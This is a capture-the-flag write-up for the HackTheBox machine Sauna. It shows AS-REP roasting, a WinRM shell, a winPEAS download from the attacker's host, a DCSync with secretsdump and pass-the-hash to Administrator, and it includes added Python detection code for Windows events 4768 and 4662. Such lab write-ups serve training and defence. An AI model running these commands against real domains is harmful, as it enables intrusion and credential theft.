Sauna (10.10.10.175) - HackTheBox

OS: Windows
Difficulty: Easy (4.9)
Author: egotisticalSW

Foothold & User

At first the usual nmap scan:


sw1tchbl4d3@bl4d3r:~/htb/Windows/Solved/Sauna-175 % nmap -p- -sV 10.10.10.175
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-16 13:12 CET
Nmap scan report for 10.10.10.175
Host is up (0.045s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-02-16 20:14:13Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49522/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49670/tcp open  msrpc         Microsoft Windows RPC
49671/tcp open  msrpc         Microsoft Windows RPC
49682/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=2/16%Time=5E4931AE%P=x86_64-unknown-linux-gnu%r
SF:(DNSVersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07ver
SF:sion\x04bind\0\0\x10\0\x03");
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 8h01m47s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-02-16T20:16:31
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 310.91 seconds
    

We can see that it's a Windows machine (as expected) and that it has a web server open on port 80.

Opening it in the browser presents us with the website of the "Egotistical Bank".

After browsing the website for a bit you'll notice the "About Us" page.

Scrolling down reveals a list of full names.

I've turned them into the username formats a sysadmin would probably use (first.last and first initial plus last name) and ended up with this list of possible usernames:


hugo.smith
fergus.smith
shaun.coins
hugo.bear
bowie.taylor
sophie.driver
steven.kerb
fsmith
scoins
hbear
btaylor
sdriver
skerb
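
Turning the full names into candidate usernames can be scripted. This is an added example (not the author's code) that builds the two formats used in the list above plus a few other common conventions; the input names are assumed to be the ones that list was derived from.

```python
import re

# Constructed input: the full names behind the username list above.
FULL_NAMES = [
    "Fergus Smith", "Shaun Coins", "Hugo Bear",
    "Bowie Taylor", "Sophie Driver", "Steven Kerb",
]


def username_candidates(full_name):
    """Return common AD username formats for one 'First Last' name.

    The first two formats are the ones used in the list above; the rest are
    other conventions a sysadmin might have picked.
    """
    parts = re.findall(r"[a-z]+", full_name.lower())   # keep only letter runs
    if len(parts) < 2:
        return []
    first, last = parts[0], parts[-1]                    # ignore middle names
    return [
        f"{first}.{last}",     # fergus.smith
        f"{first[0]}{last}",   # fsmith
        f"{first}{last}",      # fergussmith
        f"{first}_{last}",     # fergus_smith
        f"{last}.{first}",     # smith.fergus
    ]


def build_wordlist(names):
    """Flatten the candidates for every name, dropping duplicates but keeping order."""
    seen, out = set(), []
    for name in names:
        for user in username_candidates(name):
            if user not in seen:
                seen.add(user)
                out.append(user)
    return out


if __name__ == "__main__":
    # One per line, which is the -usersfile format GetNPUsers.py reads.
    print("\n".join(build_wordlist(FULL_NAMES)))
```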
    

The website didn't present any more useful data.

I tried to enumerate other services such as SMB and RPC, but none yielded any real results.

Then I turned to the Impacket tools.

Since we have a list of usernames, I tried GetNPUsers.py (with the domain EGOTISTICAL-BANK.LOCAL from the nmap scan), which asks the KDC for an AS-REP for each name and only gets one back for accounts that don't require Kerberos pre-authentication.


sw1tchbl4d3@bl4d3r:~/htb/Windows/Solved/Sauna-175 % GetNPUsers.py EGOTISTICAL-BANK.LOCAL/ -dc-ip 10.10.10.175 -usersfile usernames.txt

Impacket v0.9.22.dev1+20200611.111621.760cb1ea - Copyright 2020 SecureAuth Corporation

[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:7368a688cde75d411*8ee34
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
    

And we actually got an AS-REP hash for the user fsmith.

Cracking the hash with John gets us:

$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:T********s23
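
From the defensive side, both the username guessing and the roast above leave a clear trail in Security event 4768 (Kerberos TGT request). The following is an added detection example, not part of the writeup, run over constructed 4768 records: it flags TGTs issued without pre-authentication (the roastable account, here with RC4 etype 23, which is the "23" in the $krb5asrep$23$ header) and a burst of "client not found" failures from one source (a username list being tested). Field names follow the 4768 event schema; the attacker and DC addresses are assumed from the writeup.

```python
from collections import Counter

RC4_HMAC = 0x17                        # etype 23: the "$krb5asrep$23$" in the hash above
KDC_ERR_C_PRINCIPAL_UNKNOWN = "0x6"    # "Client not found in Kerberos database"
UF_DONT_REQUIRE_PREAUTH = 0x400000     # userAccountControl bit that makes an account roastable


def tgt_event(user, ip, status, preauth=None, etype=None):
    """Build one constructed 4768 record; a failed request logs PreAuthType as '-'."""
    return {"TargetUserName": user, "IpAddress": ip, "Status": status,
            "PreAuthType": preauth, "TicketEncryptionType": etype}


# Constructed sample: five non-existent names tried from one host, then the
# roastable account, then a normal logon that used timestamp pre-auth (type 2).
SAMPLE_4768 = [tgt_event(u, "10.10.14.166", KDC_ERR_C_PRINCIPAL_UNKNOWN)
               for u in ("hugo.smith", "shaun.coins", "hugo.bear", "bowie.taylor", "sophie.driver")]
SAMPLE_4768 += [
    tgt_event("fsmith", "10.10.14.166", "0x0", preauth=0, etype=RC4_HMAC),
    tgt_event("administrator", "10.10.10.50", "0x0", preauth=2, etype=0x12),
]


def asrep_roast_hits(events):
    """TGTs issued with PreAuthType 0: the AS-REP is crackable offline, worse if RC4."""
    return [(e["TargetUserName"], e["IpAddress"], e["TicketEncryptionType"] == RC4_HMAC)
            for e in events if e["Status"] == "0x0" and e["PreAuthType"] == 0]


def enumeration_sources(events, threshold=5):
    """Source IPs with at least `threshold` unknown-principal failures."""
    hits = Counter(e["IpAddress"] for e in events
                   if e["Status"] == KDC_ERR_C_PRINCIPAL_UNKNOWN)
    return {ip: n for ip, n in hits.items() if n >= threshold}


def preauth_disabled(user_account_control):
    """The fix on the account side: this bit should be clear on every user."""
    return bool(user_account_control & UF_DONT_REQUIRE_PREAUTH)
```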

With evil-winrm we get a shell using that password.


sw1tchbl4d3@bl4d3r:~/htb/Windows/Solved/Sauna-175 % evil-winrm -i 10.10.10.175 -u fsmith -p 'T********s23'

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\FSmith\Documents>
    

You'll find the user flag on fsmith's Desktop.

Root

After getting the user flag I did some basic enumeration; for that I downloaded the winPEAS executable to the machine.

Because the HackTheBox machines don't have internet access, I downloaded the file to my PC and started a Python SimpleHTTPServer.

The machine can then fetch the file from my SimpleHTTPServer like this:

Invoke-WebRequest "http://10.10.14.166:8000/winPEAS.exe" -OutFile winPEAS.exe

and then run it:


*Evil-WinRM* PS C:\Users\FSmith\Documents> ./winPEAS.exe
[...]
[+] Looking for AutoLogon credentials(T1012)
	Some AutoLogon credentials were found!!
	DefaultDomainName             :  EGOTISTICALBANK
	DefaultUserName               :  EGOTISTICALBANK\svc_loanmanager
	DefaultPassword               :  M***********************d!
[...]
    

And we get the credentials for svc_loanmanager.

Not really knowing what to do with that user, I turned back to Impacket to try to get more information about the system.

And secretsdump.py worked now, with the privileges svc_loanmanager gave us:


sw1tchbl4d3@bl4d3r:~/htb/Windows/Solved/Sauna-175 % secretsdump.py svc_loanmgr@10.10.10.175 -dc-ip 10.10.10.175
Impacket v0.9.22.dev1+20200611.111621.760cb1ea - Copyright 2020 SecureAuth Corporation

Password:
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad***ee:d9485***9dff:::
[...]
[*] Cleaning up... 
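
The "Using the DRSUAPI method" line means secretsdump asked the DC to replicate the directory the way another DC would (the technique commonly called DCSync), which is why it worked even though the earlier RemoteOperations step was denied. On the DC this shows up as Security event 4662 carrying the replication control-access GUIDs. Below is an added detection example, not from the writeup, run over constructed 4662 records; the GUIDs are the documented extended-right GUIDs, and SAUNA$ (from the nmap Host line) is assumed to be the only legitimate replication source.

```python
import re

# Extended rights that allow pulling directory secrets; an account holding these
# on the domain object can replicate password hashes the way a DC does.
DS_REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}")
CONTROL_ACCESS = "0x100"               # AccessMask value for extended rights
DC_ACCOUNTS = {"SAUNA$"}               # assumed: the only host that should replicate


def ds_event(subject, domain, properties, mask=CONTROL_ACCESS):
    """Build one constructed 4662 record; Properties is the raw multi-line string."""
    return {"SubjectUserName": subject, "SubjectDomainName": domain,
            "AccessMask": mask, "Properties": properties}


# Constructed sample: the DC itself replicating (expected), a service account
# doing the same (DCSync), and an unrelated read on some other object.
SAMPLE_4662 = [
    ds_event("SAUNA$", "EGOTISTICAL-BANK",
             "{19195a5b-6da0-11d0-afd3-00c04fd930c9}\n{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"),
    ds_event("svc_loanmgr", "EGOTISTICAL-BANK",
             "{19195a5b-6da0-11d0-afd3-00c04fd930c9}\n{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n"
             "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"),
    ds_event("fsmith", "EGOTISTICAL-BANK", "{bf967aba-0de6-11d0-a285-00aa003049e2}", mask="0x10"),
]


def replication_rights_used(event):
    """Names of replication rights referenced in the event's Properties field."""
    if event["AccessMask"] != CONTROL_ACCESS:
        return []
    guids = GUID_RE.findall(event["Properties"].lower())
    return [DS_REPLICATION_RIGHTS[g] for g in guids if g in DS_REPLICATION_RIGHTS]


def dcsync_alerts(events, dc_accounts=DC_ACCOUNTS):
    """Replication by anything that is not a known DC computer account."""
    alerts = []
    for e in events:
        rights = replication_rights_used(e)
        if rights and e["SubjectUserName"].upper() not in dc_accounts:
            alerts.append((f'{e["SubjectDomainName"]}\\{e["SubjectUserName"]}', rights))
    return alerts
```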
    

Now we can just pass the hash and log in as the Administrator user!


sw1tchbl4d3@bl4d3r:~/htb/Windows/Solved/Sauna-175 % evil-winrm -i 10.10.10.175 -u Administrator -H d9485***9dff

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents>
    

And now we can just read the root flag!

~sw1tchbl4d3, 13/07/2020 (dd/mm/yyyy)